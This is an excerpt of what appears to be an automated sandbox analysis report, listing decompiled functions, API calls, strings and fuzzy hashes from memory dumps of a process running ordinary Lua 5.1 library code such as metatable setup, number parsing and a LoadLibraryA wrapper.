Instruction Fuzzy Hash: 2E11A1BEA00A2132E511D1247C83FDF3298CFA2698F440024FE45A9287FAE6E39541E7

Uniqueness

Uniqueness Score: -1.00%

Function 00991010, Relevance: 22.8, APIs: 11, Strings: 2, Instructions: 61
COMMON

Download Yara Rule

C-Code - Quality: 32%

			E00991010(intOrPtr _a4, intOrPtr _a8, intOrPtr* _a12) {
				intOrPtr _t6;
				intOrPtr _t14;
				intOrPtr* _t15;
				intOrPtr _t16;
				void* _t17;
				void* _t18;

				_t16 = _a4;
				_t14 = _a8;
				_push(_t14);
				_push(_t16);
				L00994AD6();
				_push("__index");
				_push(_t16);
				L00994AD0();
				_push(0);
				_push(0);
				_push(_t16);
				L00994ACA();
				_push("class");
				_push(_t16);
				L00994AD0();
				_push(_t14);
				_push(_t16);
				L00994AD0();
				_push(0xfffffffd);
				_push(_t16);
				L00994AC4();
				_t15 = _a12;
				_t18 = _t17 + 0x34;
				_t6 =  *_t15;
				while(_t6 != 0) {
					_push(_t6);
					_push(_t16);
					L00994AD0();
					_push(0);
					_push( *((intOrPtr*)(_t15 + 4)));
					_push(_t16);
					L00994ABE();
					asm("sbb edx, edx");
					_push(( ~( *((intOrPtr*)( *_t15)) - 0x5f) & 0x00000002) + 0xfffffffb);
					_push(_t16);
					L00994AC4();
					_t6 =  *((intOrPtr*)(_t15 + 8));
					_t15 = _t15 + 8;
					_t18 = _t18 + 0x1c;
				}
				_push(0xfffffffd);
				_push(_t16);
				L00994AC4();
				_push(0xfffffffe);
				_push(_t16);
				L00994AB8();
				return _t6;
			}

0x00991011
0x00991016
0x0099101a
0x0099101b
0x0099101c
0x00991021
0x00991026
0x00991027
0x0099102c
0x0099102e
0x00991030
0x00991031
0x00991036
0x0099103b
0x0099103c
0x00991041
0x00991042
0x00991043
0x00991048
0x0099104a
0x0099104b
0x00991050
0x00991054
0x00991057
0x0099105b
0x0099105d
0x0099105e
0x0099105f
0x00991067
0x00991069
0x0099106a
0x0099106b
0x00991079
0x00991081
0x00991082
0x00991083
0x00991088
0x0099108b
0x0099108e
0x00991091
0x00991095
0x00991097
0x00991098
0x0099109d
0x0099109f
0x009910a0
0x009910aa

APIs

luaL_newmetatable.LUA5.1(?,?), ref: 0099101C
lua_pushstring.LUA5.1(?,__index,?,?), ref: 00991027
lua_createtable.LUA5.1(?,00000000,00000000,?,__index,?,?), ref: 00991031
lua_pushstring.LUA5.1(?,class,?,00000000,00000000,?,__index,?,?), ref: 0099103C
lua_pushstring.LUA5.1(?,?,?,class,?,00000000,00000000,?,__index,?,?), ref: 00991043
lua_rawset.LUA5.1(?,000000FD,?,?,?,class,?,00000000,00000000,?,__index,?,?), ref: 0099104B
lua_pushstring.LUA5.1(?,00000000), ref: 0099105F
lua_pushcclosure.LUA5.1(?,?,00000000,?,00000000), ref: 0099106B
lua_rawset.LUA5.1(?,?,?,?,00000000,?,00000000), ref: 00991083
lua_rawset.LUA5.1(?,000000FD), ref: 00991098
lua_settop.LUA5.1(?,000000FE,?,000000FD), ref: 009910A0

Strings

__index, xrefs: 00991021
class, xrefs: 00991036

Memory Dump Source

Source File: 00000003.00000002.486716165.0000000000991000.00000020.00020000.sdmp, Offset: 00990000, based on PE: true

Associated: 00000003.00000002.486684810.0000000000990000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.486748403.0000000000995000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.486779033.0000000000996000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.486820104.0000000000997000.00000002.00020000.sdmp Download File

Similarity

API ID: lua_pushstring.$lua_rawset.$L_newmetatable.lua_createtable.lua_pushcclosure.lua_settop.
String ID: __index$class
API String ID: 3753550674-2055320668
Opcode ID: 1f01d8f0f28bad18de87ed1966e1bbb62b179c125813432e36b6ac2a64eb090c
Instruction ID: 3c650196091d2a56b52dfd620cdae5a85d194e6ed480c4f54c49793992b01d01
Opcode Fuzzy Hash: 1f01d8f0f28bad18de87ed1966e1bbb62b179c125813432e36b6ac2a64eb090c
Instruction Fuzzy Hash: 6801B56158B92237DE23F62D8C02F9F635DAFC3729F180304F520661D2DB15A62382EE

Uniqueness

Uniqueness Score: -1.00%

Function 00993240, Relevance: 21.2, APIs: 10, Strings: 2, Instructions: 157
COMMON

Download Yara Rule

C-Code - Quality: 47%

			E00993240(intOrPtr __eax, long long __fp0, intOrPtr _a4) {
				char _v264;
				char _v524;
				char _v548;
				intOrPtr _v552;
				long long _v556;
				intOrPtr _v560;
				intOrPtr _v564;
				intOrPtr _v568;
				void* _t32;
				intOrPtr _t33;
				void* _t40;
				void* _t52;
				intOrPtr _t71;
				intOrPtr _t76;

				_t93 = __fp0;
				_t76 = _a4;
				_push(0xbff00000);
				_push(0);
				_push(3);
				_push(_t76);
				L00994B72();
				_v556 = __fp0;
				_push(3);
				_push(_t76);
				_v524 = 0;
				_v264 = 0;
				L00994AB8();
				_push(0);
				_push(0);
				_push(_t76);
				L00994ACA();
				_push(_t76);
				L00994B60();
				_push(0);
				_push(0);
				_push(_t76);
				_t71 = __eax;
				L00994ACA();
				_push(_t76);
				L00994B60();
				_push(0);
				_push(0);
				_push(_t76);
				_v568 = __eax;
				L00994ACA();
				_push(_t76);
				L00994B60();
				_v560 = __eax;
				_t32 = E009933E0(__fp0, _t76, 1, 0xffffffff, __eax,  &_v524);
				_push( &_v524);
				_push(_v568);
				_push(1);
				_push(_t76);
				_t52 = _t32;
				_t33 = E00993540(__fp0);
				_v564 = _t33;
				if(_t33 > 0) {
					_v556 = 0;
					_v552 = 0;
				}
				_push(0xbff00000);
				E00992CE0( &_v548, _v556, _v552, 0);
				E00992DC0(_t93,  &_v548);
				_t19 = E009933E0(_t93, _t76, 2, _t52, _t71,  &_v264) + 1; // 0x1
				_t53 = _t19;
				_t40 = E00994130(_t93, _t19,  &_v524,  &_v264, 0,  &_v548);
				if(_t40 > 0 || _v564 > 0) {
					E009936B0(_t93, _t76,  &_v524, _t53, _t71, _v568, _v564);
					E00993730(E00993730(E009936B0(_t93, _t76,  &_v264, _t53, _t71, _v560, 0), _t93, _t76, _v568), _t93, _t76, _v560);
					return 2;
				} else {
					if(_t40 != 0) {
						_push("error");
						_push(_t76);
						L00994AD0();
						return 3;
					} else {
						_push("timeout");
						_push(_t76);
						L00994AD0();
						return 3;
					}
				}
			}

0x00993240
0x0099324e
0x00993254
0x00993259
0x0099325a
0x0099325c
0x0099325d
0x00993262
0x00993266
0x00993268
0x00993269
0x0099326d
0x00993274
0x00993279
0x0099327a
0x0099327b
0x0099327c
0x00993281
0x00993282
0x00993287
0x00993288
0x00993289
0x0099328a
0x0099328c
0x00993291
0x00993292
0x00993297
0x00993298
0x00993299
0x0099329a
0x0099329e
0x009932a6
0x009932a7
0x009932ac
0x009932bb
0x009932c8
0x009932c9
0x009932ca
0x009932cc
0x009932cd
0x009932cf
0x009932d7
0x009932dd
0x009932df
0x009932e7
0x009932e7
0x009932f7
0x00993305
0x0099330f
0x0099332a
0x0099332a
0x0099333e
0x00993348
0x0099339c
0x009933c9
0x009933dc
0x00993352
0x00993354
0x00993370
0x00993375
0x00993376
0x00993389
0x00993356
0x00993356
0x0099335b
0x0099335c
0x0099336f
0x0099336f
0x00993354

APIs

luaL_optnumber.LUA5.1(?,00000003,00000000,BFF00000), ref: 0099325D
lua_settop.LUA5.1(?,00000003,?,00000003,00000000,BFF00000), ref: 00993274
lua_createtable.LUA5.1(?,00000000,00000000,?,00000003,?,00000003,00000000,BFF00000), ref: 0099327C
lua_gettop.LUA5.1(?,?,00000000,00000000,?,00000003,?,00000003,00000000,BFF00000), ref: 00993282
lua_createtable.LUA5.1(?,00000000,00000000,?,?,00000000,00000000,?,00000003,?,00000003,00000000,BFF00000), ref: 0099328C
lua_gettop.LUA5.1(?,?,00000000,00000000,?,?,00000000,00000000,?,00000003,?,00000003,00000000,BFF00000), ref: 00993292
lua_createtable.LUA5.1(?,00000000,00000000,?,?,00000000,00000000,?,?,00000000,00000000,?,00000003,?,00000003,00000000), ref: 0099329E
lua_gettop.LUA5.1(?), ref: 009932A7

Part of subcall function 009933E0: lua_type.LUA5.1 ref: 009933FC

Part of subcall function 00993540: lua_type.LUA5.1(000000FF,00000000,?,?,?,009932D4,?,00000001,?,?,?,00000001), ref: 00993557

lua_pushstring.LUA5.1(?,timeout), ref: 0099335C
lua_pushstring.LUA5.1(?,error), ref: 00993376

Strings

timeout, xrefs: 00993356
error, xrefs: 00993370

Memory Dump Source

Source File: 00000003.00000002.486716165.0000000000991000.00000020.00020000.sdmp, Offset: 00990000, based on PE: true

Associated: 00000003.00000002.486684810.0000000000990000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.486748403.0000000000995000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.486779033.0000000000996000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.486820104.0000000000997000.00000002.00020000.sdmp Download File

Similarity

API ID: lua_createtable.lua_gettop.$lua_pushstring.lua_type.$L_optnumber.lua_settop.
String ID: error$timeout
API String ID: 3676767314-3980372344
Opcode ID: 5f995eb22c18c8ad32b3300ba1f6fff0ed1a52342c0c148ba2477b9a7ccb413d
Instruction ID: 9cf2738a80f0ba96d842b596e74ca050d7ec8142b1e6a928374a4afede127060
Opcode Fuzzy Hash: 5f995eb22c18c8ad32b3300ba1f6fff0ed1a52342c0c148ba2477b9a7ccb413d
Instruction Fuzzy Hash: 9241AEB26053047EE611EE689C82FAFB3ACEFC5358F004A1DF54496281EA75DE0587F6

Uniqueness

Uniqueness Score: -1.00%

Function 10015EF0, Relevance: 21.1, APIs: 9, Strings: 3, Instructions: 149stringCOMMON

Download Yara Rule

APIs

strchr.MSVCRT ref: 10015F0F
luaL_error.LUA5.1(?,invalid format (repeated flags),00000002,00000001,?,?,10015BAD,?,00000001,?), ref: 10015F33
_isctype.MSVCRT ref: 10015F53
_isctype.MSVCRT ref: 10015F83
_isctype.MSVCRT ref: 10015FB8
_isctype.MSVCRT ref: 10015FE7
_isctype.MSVCRT ref: 10016017
luaL_error.LUA5.1(?,invalid format (width or precision too long),00000002,00000001,?,?,10015BAD,?,00000001,?), ref: 1001603A
strncpy.MSVCRT ref: 10016054

Strings

invalid format (repeated flags), xrefs: 10015F2D
-+ #0, xrefs: 10015F0A
invalid format (width or precision too long), xrefs: 10016034

Memory Dump Source

Source File: 00000003.00000002.495890143.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.495868101.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.496034889.0000000010017000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.496071357.0000000010019000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.496100513.000000001001A000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.496130181.000000001001B000.00000002.00020000.sdmp Download File

Similarity

API ID: _isctype$L_error.$strchrstrncpy
String ID: -+ #0$invalid format (repeated flags)$invalid format (width or precision too long)
API String ID: 1263742585-3328158417
Opcode ID: 0c5fd276934c4c8010957cb0a4ffaca898b06c8e7dab1ffb6794f4d30b234629
Instruction ID: bf244b8073dfa03b507056284243ae7c65b55c8c1b8dea7c3332d435bca47c31
Opcode Fuzzy Hash: 0c5fd276934c4c8010957cb0a4ffaca898b06c8e7dab1ffb6794f4d30b234629
Instruction Fuzzy Hash: AD41B574204291CFE312CF248C917667BF5EF4E245F2944BCE9C58F251DA36E896CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 100101C0, Relevance: 21.1, APIs: 11, Strings: 1, Instructions: 110
stringCOMMON

Download Yara Rule

C-Code - Quality: 62%

			E100101C0(void* __ecx, void* __edi, void* __eflags, long __fp0, char* _a4) {
				intOrPtr _v4;
				long _v8;
				void* __ebx;
				void* __esi;
				char* _t11;
				long _t14;
				signed int _t20;
				void* _t26;
				char* _t30;
				char* _t32;
				char* _t37;
				int _t39;
				intOrPtr* _t40;
				long _t41;
				long* _t43;
				long* _t44;
				long* _t45;
				long _t53;

				_t53 = __fp0;
				_t30 = _a4;
				_t39 = E1000F600(__eflags, __fp0, _t30, 2, 0xa);
				_t43 =  &(( &_v8)[3]);
				_t51 = _t39 - 0xa;
				if(_t39 != 0xa) {
					_t11 = E1000F4A0(__eflags, _t30, 1, 0);
					_t44 =  &(_t43[3]);
					__eflags = _t39 - 2;
					_t37 = _t11;
					if(__eflags < 0) {
						L5:
						E1000F090(_t30, _t39, __eflags, _t30, 2, "base out of range");
						_t44 =  &(_t44[3]);
					} else {
						__eflags = _t39 - 0x24;
						if(__eflags > 0) {
							goto L5;
						}
					}
					_t14 = strtoul(_t37,  &_a4, _t39);
					_t32 = _a4;
					_t45 =  &(_t44[3]);
					__eflags = _t37 - _t32;
					_t41 = _t14;
					if(_t37 == _t32) {
						goto L15;
					} else {
						_t40 = __imp___isctype;
						while(1) {
							__eflags =  *__imp____mb_cur_max - 1;
							if( *__imp____mb_cur_max <= 1) {
								_t20 =  *( *__imp___pctype) & 0x00000008;
								__eflags = _t20;
							} else {
								_t20 =  *_t40(0, 8);
								_t32 = _a4;
								_t45 =  &(_t45[2]);
							}
							__eflags = _t20;
							if(_t20 == 0) {
								break;
							}
							_t32 = _t32 + 1;
							_a4 = _t32;
						}
						__eflags =  *_t32;
						if( *_t32 != 0) {
							goto L15;
						} else {
							_v8 = _t41;
							_v4 = 0;
							asm("fild qword [esp+0xc]");
							 *(_t45 - 8) = _t53;
							_push(_t30);
							E100018E0();
							return 1;
						}
					}
				} else {
					E1000F470(_t30, _t51, _t30, 1);
					_t26 = E10001490(_t51, __fp0, _t30, 1);
					_t45 =  &(_t43[4]);
					_t52 = _t26;
					if(_t26 == 0) {
						L15:
						E100018C0(_t30);
						return 1;
					} else {
						E10001630(_t52, __fp0, _t30, 1);
						 *_t45 = _t53;
						_push(_t30);
						E100018E0();
						return 1;
					}
				}
			}

0x100101c0
0x100101c4
0x100101d4
0x100101d6
0x100101d9
0x100101dc
0x1001021f
0x10010224
0x10010227
0x1001022a
0x1001022c
0x10010233
0x1001023b
0x10010240
0x1001022e
0x1001022e
0x10010231
0x00000000
0x00000000
0x10010231
0x1001024a
0x10010250
0x10010254
0x10010257
0x10010259
0x1001025c
0x00000000
0x1001025e
0x1001025e
0x10010264
0x1001026a
0x1001026d
0x1001028f
0x1001028f
0x1001026f
0x10010276
0x10010278
0x1001027c
0x1001027c
0x10010292
0x10010294
0x00000000
0x00000000
0x10010296
0x10010297
0x10010297
0x1001029d
0x100102a0
0x00000000
0x100102a2
0x100102a2
0x100102a6
0x100102ae
0x100102b5
0x100102b8
0x100102b9
0x100102cc
0x100102cc
0x100102a0
0x100101de
0x100101e1
0x100101e9
0x100101ee
0x100101f1
0x100101f3
0x100102cd
0x100102ce
0x100102e1
0x100101f9
0x100101fc
0x10010201
0x10010204
0x10010205
0x10010218
0x10010218
0x100101f3

APIs

luaL_optinteger.LUA5.1(?,00000002,0000000A), ref: 100101CF

Part of subcall function 1000F600: lua_type.LUA5.1(?,?), ref: 1000F60C

luaL_checkany.LUA5.1(?,00000001), ref: 100101E1

Part of subcall function 1000F470: lua_type.LUA5.1(?,?), ref: 1000F47C
Part of subcall function 1000F470: luaL_argerror.LUA5.1(?,?,value expected), ref: 1000F490

lua_isnumber.LUA5.1(?,00000001,?,00000001), ref: 100101E9
lua_tonumber.LUA5.1(?,00000001), ref: 100101FC
lua_pushnumber.LUA5.1(?,?,00000001), ref: 10010205
luaL_checklstring.LUA5.1(?,00000001,00000000), ref: 1001021F
luaL_argerror.LUA5.1(?,00000002,base out of range), ref: 1001023B
strtoul.MSVCRT ref: 1001024A
_isctype.MSVCRT ref: 10010276
lua_pushnumber.LUA5.1(?), ref: 100102B9
lua_pushnil.LUA5.1(?), ref: 100102CE

Strings

base out of range, xrefs: 10010233

Memory Dump Source

Source File: 00000003.00000002.495890143.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.495868101.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.496034889.0000000010017000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.496071357.0000000010019000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.496100513.000000001001A000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.496130181.000000001001B000.00000002.00020000.sdmp Download File

Similarity

API ID: L_argerror.lua_pushnumber.lua_type.$L_checkany.L_checklstring.L_optinteger._isctypelua_isnumber.lua_pushnil.lua_tonumber.strtoul
String ID: base out of range
API String ID: 1721004851-1316682021
Opcode ID: a761916a13351d324bb90dfe20cb7c1245e7ccb7669a5eec7431728ee1b117a7
Instruction ID: aa391e7296bd25b7877d2af0e1fb9873eb7ec9d51fec86cf74cae5ecd3c228cb
Opcode Fuzzy Hash: a761916a13351d324bb90dfe20cb7c1245e7ccb7669a5eec7431728ee1b117a7
Instruction Fuzzy Hash: A8312E75F443005BE210E624ACC2B9A77D8EB45395F044465FDC59F283EABAE58883A2

Uniqueness

Uniqueness Score: -1.00%

Function 00A211C0, Relevance: 21.1, APIs: 10, Strings: 2, Instructions: 86
libraryCOMMON

Download Yara Rule

C-Code - Quality: 58%

			E00A211C0(intOrPtr _a4) {
				char _v4;
				void* __edi;
				CHAR* _t6;
				CHAR* _t9;
				CHAR* _t14;
				char _t15;
				char _t18;
				void* _t20;
				intOrPtr _t21;
				CHAR* _t22;
				char _t23;
				void* _t24;
				void* _t26;
				void* _t28;

				_t21 = _a4;
				_t6 =  &_v4;
				_push(_t6);
				_push(_t21);
				L00A23F38();
				_push(_t6);
				_push(_t21);
				L00A23F32();
				_t14 = _t6;
				_t23 = malloc(_v4 + 1);
				_t26 = _t24 + 0x14;
				if(_t23 == 0) {
					_push("out of memory!");
					_push(_t21);
					L00A23F26();
					return 0;
				} else {
					_t9 = _t14;
					_t20 = _t23 - _t14;
					do {
						_t18 =  *_t9;
						 *((char*)(_t20 + _t9)) = _t18;
						_t9 =  &(_t9[1]);
					} while (_t18 != 0);
					_push(8);
					_push(_t21);
					L00A23F2C();
					_t22 = _t9;
					_t28 = _t26 + 8;
					if(_t22 == 0) {
						_push("out of memory!");
						_push(_t21);
						L00A23F26();
						_t28 = _t28 + 8;
					}
					_t15 = LoadLibraryA(_t14);
					if(_t15 != 0) {
						_push("alien_library");
						_push(0xffffd8f0);
						_push(_t21);
						L00A23F02();
						_push(0xfffffffe);
						_push(_t21);
						L00A23F1A();
						 *_t22 = _t15;
						_t22[4] = _t23;
						return 1;
					} else {
						E00A21080(_t21);
						_push(_t21);
						L00A23F20();
						return 0;
					}
				}
			}

0x00a211c5
0x00a211c9
0x00a211cd
0x00a211ce
0x00a211cf
0x00a211d7
0x00a211d8
0x00a211d9
0x00a211e6
0x00a211ee
0x00a211f0
0x00a211f5
0x00a2127a
0x00a2127f
0x00a21280
0x00a2128f
0x00a211fb
0x00a211fd
0x00a211ff
0x00a21201
0x00a21201
0x00a21203
0x00a21206
0x00a21209
0x00a2120d
0x00a2120f
0x00a21210
0x00a21215
0x00a21217
0x00a2121c
0x00a2121e
0x00a21223
0x00a21224
0x00a21229
0x00a21229
0x00a21233
0x00a21237
0x00a2124f
0x00a21254
0x00a21259
0x00a2125a
0x00a2125f
0x00a21261
0x00a21262
0x00a2126b
0x00a2126d
0x00a21279
0x00a21239
0x00a21239
0x00a2123e
0x00a2123f
0x00a2124e
0x00a2124e
0x00a21237

APIs

lua_gettop.LUA5.1(?,?), ref: 00A211CF
luaL_checklstring.LUA5.1(?,00000000), ref: 00A211D9
malloc.MSVCR80 ref: 00A211E8
lua_newuserdata.LUA5.1(?,00000008), ref: 00A21210
luaL_error.LUA5.1(?,out of memory!), ref: 00A21224
LoadLibraryA.KERNEL32(00000000), ref: 00A2122D
lua_error.LUA5.1(?), ref: 00A2123F
lua_getfield.LUA5.1(?,FFFFD8F0,alien_library), ref: 00A2125A
lua_setmetatable.LUA5.1(?,000000FE,?,FFFFD8F0,alien_library), ref: 00A21262
luaL_error.LUA5.1(?,out of memory!), ref: 00A21280

Strings

alien_library, xrefs: 00A2124F
out of memory!, xrefs: 00A2121E, 00A2127A

Memory Dump Source

Source File: 00000003.00000002.487114164.0000000000A21000.00000020.00020000.sdmp, Offset: 00A20000, based on PE: true

Associated: 00000003.00000002.487089623.0000000000A20000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.487157920.0000000000A25000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.487201925.0000000000A27000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.487230936.0000000000A28000.00000002.00020000.sdmp Download File

Similarity

API ID: L_error.$L_checklstring.LibraryLoadlua_error.lua_getfield.lua_gettop.lua_newuserdata.lua_setmetatable.malloc
String ID: alien_library$out of memory!
API String ID: 3439651773-1405673311
Opcode ID: 4b0f0fbccd773e8aa804c811fd83b602c7aa6e3c8aed359b35f5da2e892fe554
Instruction ID: 7af6679c11f666c722e8ac4414aec2c1d47ba1b52dbdf41554105718b80a1847
Opcode Fuzzy Hash: 4b0f0fbccd773e8aa804c811fd83b602c7aa6e3c8aed359b35f5da2e892fe554
Instruction Fuzzy Hash: 7311A273E483207BCA10377C7E8297F73A8EFA2331B14453DF801D6202EA5998064271

Uniqueness

Uniqueness Score: -1.00%

Function 004010B0, Relevance: 21.1, APIs: 10, Strings: 2, Instructions: 56
COMMON

Download Yara Rule

C-Code - Quality: 31%

			E004010B0(void* __eax, intOrPtr _a4) {
				intOrPtr _t6;

				_t6 = _a4;
				_push(1);
				_push(_t6);
				L00401F18();
				if(__eax == 0) {
					L6:
					return 1;
				} else {
					_push("debug");
					_push(0xffffd8ee);
					_push(_t6);
					L00401EE2();
					_push(0xffffffff);
					_push(_t6);
					L00401F4E();
					if(__eax == 5) {
						_push("traceback");
						_push(0xffffffff);
						_push(_t6);
						L00401EE2();
						_push(0xffffffff);
						_push(_t6);
						L00401F4E();
						if(__eax == 6) {
							_push(1);
							_push(_t6);
							L00401EEE();
							_push(2);
							_push(_t6);
							L00401F8A();
							_push(1);
							_push(2);
							_push(_t6);
							L00401F78();
							goto L6;
						} else {
							_push(0xfffffffd);
							_push(_t6);
							L00401F0C();
							return 1;
						}
					} else {
						_push(0xfffffffe);
						_push(_t6);
						L00401F0C();
						return 1;
					}
				}
			}

0x004010b1
0x004010b5
0x004010b7
0x004010b8
0x004010c2
0x00401142
0x00401148
0x004010c4
0x004010c4
0x004010c9
0x004010ce
0x004010cf
0x004010d4
0x004010d6
0x004010d7
0x004010e2
0x004010f6
0x004010fb
0x004010fd
0x004010fe
0x00401103
0x00401105
0x00401106
0x00401111
0x00401125
0x00401127
0x00401128
0x0040112d
0x0040112f
0x00401130
0x00401135
0x00401137
0x00401139
0x0040113a
0x00000000
0x00401113
0x00401113
0x00401115
0x00401116
0x00401124
0x00401124
0x004010e4
0x004010e4
0x004010e6
0x004010e7
0x004010f5
0x004010f5
0x004010e2

APIs

lua_isstring.LUA5.1(?,00000001), ref: 004010B8
lua_getfield.LUA5.1(?,FFFFD8EE,debug), ref: 004010CF
lua_type.LUA5.1(?,000000FF,?,FFFFD8EE,debug), ref: 004010D7
lua_settop.LUA5.1(?,000000FE), ref: 004010E7
lua_getfield.LUA5.1(?,000000FF,traceback), ref: 004010FE
lua_type.LUA5.1(?,000000FF,?,000000FF,traceback), ref: 00401106
lua_settop.LUA5.1(?,000000FD), ref: 00401116

Strings

traceback, xrefs: 004010F6
debug, xrefs: 004010C4

Memory Dump Source

Source File: 00000003.00000002.481771819.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.481676145.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.481875011.0000000000403000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.481973747.0000000000405000.00000002.00020000.sdmp Download File

Similarity

API ID: lua_getfield.lua_settop.lua_type.$lua_isstring.
String ID: debug$traceback
API String ID: 3829249094-120824644
Opcode ID: ec8179198e74a3ba0cf95919a1953d14fd26624f19738b8cc6b635adb13d735e
Instruction ID: 663e994950555ae319600f3ef6b6b2ff4956610ed52c8e135a580ac33c4f3c89
Opcode Fuzzy Hash: ec8179198e74a3ba0cf95919a1953d14fd26624f19738b8cc6b635adb13d735e
Instruction Fuzzy Hash: 94014B61A1952232D962321D6C83FCE10094F02325F65437BF920792E6EBBE4A8200EE

Uniqueness

Uniqueness Score: -1.00%

Function 009C1060, Relevance: 19.6, APIs: 13, Instructions: 113
COMMON

Download Yara Rule

C-Code - Quality: 59%

			E009C1060(intOrPtr __eax, long long __fp0, intOrPtr _a4) {
				char _v0;
				void* _v524;
				intOrPtr _v528;
				intOrPtr _v532;
				char _v536;
				intOrPtr _v540;
				intOrPtr* _t23;
				intOrPtr _t27;
				intOrPtr _t32;
				char* _t34;
				intOrPtr* _t43;
				intOrPtr _t44;
				void* _t46;
				long long* _t47;
				long long _t53;

				_t53 = __fp0;
				_t44 = _a4;
				_push(1);
				_push(_t44);
				_v536 = 0;
				L009C2132();
				L009C2150();
				_t42 = __eax;
				_t23 =  &_v536;
				_push(_t23);
				_push(0);
				_push(2);
				_push(_t44);
				_v540 = __eax;
				L009C212C();
				_t43 = _t23;
				_push(0x40530000);
				_push(0);
				_push(3);
				_push(_t44);
				_v532 = _t43 + _v536;
				L009C2126();
				_t46 =  &_v540 + 0x28;
				L009C2150();
				_t32 = _t23;
				_v528 = _t32;
				if(_t43 != 0) {
					_push( &_v524);
					_push(_t44);
					L009C211A();
					_t47 = _t46 + 8;
					if(_t43 >= _v532) {
						L15:
						_t34 =  &_v524;
						_push(_t34);
						L009C2108();
						asm("fild dword [esp+0x14]");
						_push(_t34);
						goto L16;
					} else {
						goto L5;
					}
					do {
						L5:
						_t27 =  *_t43;
						if(_t27 == 0xa) {
							_push(0x9c3064);
							_push( &_v524);
							L009C2114();
							_t47 = _t47 + 8;
							_t42 = _t32;
						} else {
							if(_t27 != 0xd) {
								if(_t42 <= 0) {
									_push(0x9c3064);
									_push( &_v524);
									_t42 = _t32;
									L009C2114();
									_t47 = _t47 + 8;
								}
								if(_v524 >=  &_v0) {
									_push( &_v524);
									L009C210E();
									_t47 = _t47 + 4;
								}
								 *_v524 =  *_t43;
								_t42 = _t42 - 1;
								_v524 = _v524 + 1;
							}
						}
						_t43 = _t43 + 1;
					} while (_t43 < _v532);
					_v540 = _t42;
					goto L15;
				} else {
					if(__eax >= _t32) {
						_push(_t44);
						L009C2120();
						asm("fild dword [esp+0x20]");
						_t47 = _t46 + 4 - 8;
					} else {
						_push(0x9c3064);
						_push(_t44);
						L009C20F6();
						asm("fild dword [esp+0x24]");
						_t47 = _t46 + 8 - 8;
					}
					L16:
					 *_t47 = _t53;
					_push(_t44);
					L009C2102();
					return 2;
				}
			}

0x009c1060
0x009c1068
0x009c1071
0x009c1073
0x009c1074
0x009c107c
0x009c1081
0x009c1086
0x009c1088
0x009c108c
0x009c108d
0x009c108f
0x009c1091
0x009c1092
0x009c1096
0x009c109f
0x009c10a1
0x009c10a6
0x009c10ab
0x009c10ad
0x009c10ae
0x009c10b2
0x009c10b7
0x009c10ba
0x009c10bf
0x009c10c3
0x009c10c7
0x009c1100
0x009c1101
0x009c1102
0x009c110b
0x009c1110
0x009c1185
0x009c1185
0x009c1189
0x009c118a
0x009c118f
0x009c1193
0x00000000
0x00000000
0x00000000
0x00000000
0x009c1112
0x009c1112
0x009c1112
0x009c1116
0x009c1168
0x009c116d
0x009c116e
0x009c1173
0x009c1176
0x009c1118
0x009c111a
0x009c111e
0x009c1124
0x009c1129
0x009c112a
0x009c112c
0x009c1131
0x009c1131
0x009c1141
0x009c1147
0x009c1148
0x009c114d
0x009c114d
0x009c1156
0x009c115d
0x009c115e
0x009c115e
0x009c111a
0x009c117c
0x009c117d
0x009c1181
0x00000000
0x009c10c9
0x009c10cb
0x009c10e7
0x009c10e8
0x009c10ed
0x009c10f4
0x009c10cd
0x009c10cd
0x009c10d2
0x009c10d3
0x009c10d8
0x009c10df
0x009c10df
0x009c1194
0x009c1194
0x009c1197
0x009c1198
0x009c11af
0x009c11af

APIs

luaL_checknumber.LUA5.1 ref: 009C107C
_ftol.MSVCRT ref: 009C1081
luaL_optlstring.LUA5.1(?,00000002,00000000,00000000), ref: 009C1096
luaL_optnumber.LUA5.1(?,00000003,00000000,40530000,?,00000002,00000000,00000000), ref: 009C10B2
_ftol.MSVCRT ref: 009C10BA
lua_pushstring.LUA5.1(?,009C3064,?,?,?,?,?,00000001), ref: 009C10D3
lua_pushnil.LUA5.1(?,?,?,?,?,?,00000001), ref: 009C10E8
luaL_buffinit.LUA5.1(?,?,?,?,?,?,?,00000001), ref: 009C1102
luaL_addstring.LUA5.1(?,009C3064,?,?,?,?,?,?,?,00000001), ref: 009C112C
luaL_prepbuffer.LUA5.1(?,?,?,?,?,?,?,?,00000001), ref: 009C1148
luaL_pushresult.LUA5.1(?,?,?,?,?,?,?,?,00000001), ref: 009C118A
lua_pushnumber.LUA5.1(?,?,?,?,?,?,?,?,?,?,00000001), ref: 009C1198

Memory Dump Source

Source File: 00000003.00000002.486890418.00000000009C1000.00000020.00020000.sdmp, Offset: 009C0000, based on PE: true

Associated: 00000003.00000002.486863680.00000000009C0000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.486943477.00000000009C3000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.486972534.00000000009C4000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.487005169.00000000009C5000.00000002.00020000.sdmp Download File

Similarity

API ID: _ftol$L_addstring.L_buffinit.L_checknumber.L_optlstring.L_optnumber.L_prepbuffer.L_pushresult.lua_pushnil.lua_pushnumber.lua_pushstring.
String ID:
API String ID: 1905715778-0
